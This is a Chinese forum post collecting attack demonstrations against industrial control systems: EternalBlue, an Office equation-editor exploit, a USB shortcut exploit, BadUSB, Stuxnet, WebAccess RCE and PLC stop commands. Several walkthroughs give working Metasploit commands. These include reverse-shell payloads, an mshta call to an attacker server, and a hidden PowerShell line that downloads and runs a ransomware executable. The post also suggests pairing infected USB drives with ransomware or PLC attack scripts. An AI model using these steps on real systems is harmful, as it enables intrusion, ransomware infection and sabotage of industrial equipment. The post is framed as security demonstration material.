完善资料让更多小伙伴认识你,还能领取20积分哦, 立即完善>
|
|
相关推荐
1个回答
|
|
前言
在此文中分享一些可以在工控安全项目中进行攻防演示的案例,以供大家参考。 针对工控系统上位机操作系统攻防案例 漏洞一:永恒之蓝 MS17-010 (永恒之蓝Eternalblue) 漏洞描述 永恒之蓝(Eternalblue)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 漏洞影响 目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012等。 演示步骤 1.使用nmap对目标进行扫描,确定目标存在永恒之蓝漏洞,执行如下命令nmap --script smb-vuln-ms17-010 192.168.28.128 2.使用Metasploit对目标进行攻击,执行如下操作 输入msfconsole启动Metasploit 在Metasploit中,输入search ms17-010查找永恒之蓝漏洞 输入 use exploit/windows/smb/ms17_010_eternalblue选择漏洞利用模块 输入 show options查看当前攻击配置 将配置中第一行的 RHOST修改为目标IP地址 配置完成后,输入 run命令执行漏洞攻击,如果执行成功,会获得目标机器windows系统的shell终端,可对该目标机器执行任何命令 针对工控系统上位机办公软件攻防案例 漏洞一:噩梦公式二代 CVE-2017-11882&CVE-2018-0802 (Microsoft Office内存破坏漏洞) 漏洞描述 在2017年11月14日,微软发布11月份安全补丁更新,其中更新了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882) “噩梦公式一代“,而在2018年1月,又爆出了office 0day漏洞(CVE-2018-0802),该漏洞的技术原理类似17年修补的漏洞,是由于office公式编辑器组件EQNEDT32.EXE,对字体名的长度没有进行长度检验,导致攻击者可以通过构造恶意的字体名,执行任意代码。 漏洞影响 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office 2016 演示步骤 1.下载漏洞利用脚本备用https://github.com/Ridter/RTF_11882_0802/blob/master/RTF_11882_0802.py 2.使用Metasploit生成攻击反向控制后门文件 3.使用漏洞利用脚本,执行如下命令,生成包含漏洞的office文件 python RTF_11882_0802.py -c “mshta http://192.168.103.152:8080/123” -o test.doc 4.将生成的test.doc文件,利用一些手段传给目标,当目标打开此文件时,会反弹出一个shell会话到攻击机,此时,攻击者已经控制了目标 针对工控系统上位机USB外设攻防案例 攻击手法一:震网三代 2010年,攻击伊朗核工厂的漏洞利用工具就是“震网一代”,它因此被公认为世界上首个网络“超级破坏性武器”。 2011 年,“震网二代”蠕虫病毒出现,因为它会在临时目录下生成名为~DQ 的随机文件,也被称作Duqu。 2017年6月14日凌晨,微软发布安全公告称,Windows快捷方式存在高危漏洞(CVE-2017-8464),黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统。3此漏洞与震网病毒攻破伊朗核电站使用的漏洞非常相似,对能源、交通、金融等基础设施隔离网极具杀伤力,因此定义为“震网三代”漏洞。 漏洞简介 “震网三代”漏洞是Windows系统在处理LNK文件(快捷方式)过程中发生的远程代码执行漏洞。当存在漏洞的电脑***入恶意U盘时,不需要任何操作,漏洞攻击程序就可以完全控制用户的电脑系统。该漏洞也可能由用户访问网络共享、网络下载、拷贝文件等操作被触发和植入木马。 “震网三代”漏洞的原理与震网病毒入侵破坏伊朗核设施所使用的漏洞(CVE-2010-2568)非常相似,都可以穿透隔离网络。由于物理隔离的基础设施和核心网络通常需要使用U盘、移动硬盘等存储设备进行数据交换,能够通过U盘触发的“震网三代”漏洞就成为渗透控制隔离网的大杀器,其威力完全不亚于前两代震网攻击。 “震网三代”漏洞影响从Vista到Win 10的所有主流版本,XP和2003则不受影响。目前微软已经发布了“震网三代”漏洞补丁,同期还修复了Windows搜索远程命令执行漏洞(CVE-2017-8543)等近百个漏洞。 漏洞影响 Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016 演示步骤 1.打开msfconsole,进入metasploit控制台界面 2.指定攻击模块:use exploits/windows/fileformat/cve_2017_8464_lnk_rce 3.查看模块配置信息:show options 可以指定dll、link文件名 4.设置payload: 反弹meterpreter会话 set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.110 可以跟勒索病毒(或者PLC定向攻击脚本)结合,场景是利用震网三代漏洞制作的U盘插入待攻击机器,自动运行勒索程序(或者PLC定向攻击脚本) set payload windows/x64/exec set cmd “C:\Users\lenovo\Desktop\attack.py” 或者利用`powershell`直接远程下载执行,提前利用python假设简单的http服务(python3 -m http.server) set cmd “powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘http://192.168.159.151:8000/wcry.exe’,‘wcry.exe’);start-process wcry.exe” 5.最后执行 exploit,将生成的文件拷贝进干净、稳定、可用的U盘中即制作成功 攻击手法二:badUSB 原理简述 BadUSB最早是在2014年的黑帽大会上研究人员JakobLell和Karsten Nohl提出并展示的。不同于老式的U盘病毒,它利用了USB协议中的一个漏洞,通过模拟键盘、鼠标、网卡等从而让目标电脑执行恶意代码,达到控住主机或者窃取敏感信息等目的。 从传统意义讲,当你在电脑中插入一张CD/DVD光盘,或者插入一个USB设备时,可以通过自动播放来运行一个包含恶意的文件,不过自动播放功能被关闭时,autorun.inf文件就无法自动执行你的文件了。然而通过TEENSY,你可以模拟出一个键盘和鼠标,当你插入这个定制的USB设备时,电脑会识别为一个键盘,利用设备中的微处理器,与存储空间,和编程进去的攻击代码,就可以向主机发送控制命令,从而完全控制主机,无论自动播放是否开启,都可以成功。 演示步骤 1.攻击者事先制作好badUSB硬件设备,选择基于ATTINY85微控制器的USB开发板Digispark。 2.使用烧录代码的编译器Arduino IDE,将恶意代码烧录到BadUSB中。 3.配置好相关参数,将开发板设为Digispark,编程器设为USBtinyISP,编写好代码后,就可以点击“上传”按钮,然后插入BadUSB设备,一款简易BadUSB就做好了。 4.使用Metasploit生成攻击反向控制后门文件,执行如下命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=5555 -f exe 》shell.exe 5.在MSF服务端,开启监听,等待目标机器中后门反弹回shell 6.攻击者可诱使目标机器的使用者将特制的badu***设备插入目标设备,当目标机器***上U盘后,即会自动执行内部控制代码,在目标设备上模拟键鼠进行操作,下载执行了后门文件,此时攻击者就获得了目标机器反弹的shell,控制了目标机器。 针对工控系统编程组态软件攻防案例 攻击手法一:震网 Stuxnet(震网) 震网病毒简述 震网传播方式 Stuxnet 蠕虫的攻击目标是 SIMATIC WinCC 软件。后者主要用于工业控制系统的数据采集与监控,一般部署在专用的内部局域网中,并与外部互联网实行物理上的隔离。为了实现攻击,Stuxnet 蠕虫采取多种 手段进行渗透和传播,如图所示 整体的传播思路是:首先感染外部主机;然后感染 U 盘,利用快捷方式文件解析漏洞,传播到内部网络;在内网中,通过快捷方式解析漏洞、RPC 远程执行漏洞、打印机后台程序服务漏洞,实现联网主机之间的传播;最后抵达安装了 WinCC 软件的主机,展开攻击。 一旦发现WinCC系统,就利用其中的两个漏洞展开攻击 一个是WinCC系统中存在一个硬编码漏洞,保护访问数据库的默认用户名和密码,Stuxnet利用这一漏洞尝试访问该系统的SQL数据库 另一个是WinCC需要使用的Step7工程中,在打开工程文件时,存在DLL加载策略上的缺陷,从而导致一种类似于“DLL预加载攻击”的利用方式。最终,Stuxnet通过替换Step7软件中的s7otbxdx.dll,实现对一些查询、读取函数的Hook。 针对工控系统SCADA系统攻防案例 漏洞一:WebAccess CVE-2017-16720 漏洞简述 此漏洞允许攻击者使用RPC协议通过TCP端口4592执行远程命令。 通过利用恶意分布式计算环境/远程过程调用(DCERPC),webvrpcs.exe服务将命令行指令传递给主机, webvrpcs.exe服务以管理员访问权限运行。版本小于8.3、8.3.1、8.3.2仍然存在特定的安全漏洞。 演示步骤 参见博主之前发的文章漏洞实验:Advantech WebAccess远程命令执行 针对工控系统PLC攻防案例 攻击手法一:S7-1200启停 针对西门子S7协议或罗克韦尔AB Ethernet/IP、施耐德Modbus等工控协议,攻击者通过对主流工控协议的深度分析,向PLC设备发送远程停机、程序上传下载等控制指令数据报文,实现对下位机PLC的非法控制。 演示步骤 参见博主之前发的文章工控安全:S7-1200 PLC远程启停攻击实验 针对工控系统OPC数据通信攻防案例 攻击手法一 利用OPC协议漏洞,在通过OPC服务器与MES服务器进行数据通信过程中,攻击者可以伪装成合法的OPC Client对工控系统数据进行读写。 持续更新。。。。。. |
|
|
|
只有小组成员才能发言,加入小组>>
886浏览 0评论
小黑屋| 手机版| Archiver| 电子发烧友 ( 湘ICP备2023018690号 )
GMT+8, 2024-11-25 00:18 , Processed in 0.391582 second(s), Total 51, Slave 41 queries .
Powered by 电子发烧友网
© 2015 bbs.elecfans.com
关注我们的微信
下载发烧友APP
电子发烧友观察
版权所有 © 湖南华秋数字科技有限公司
电子发烧友 (电路图) 湘公网安备 43011202000918 号 电信与信息服务业务经营许可证:合字B2-20210191 工商网监 湘ICP备2023018690号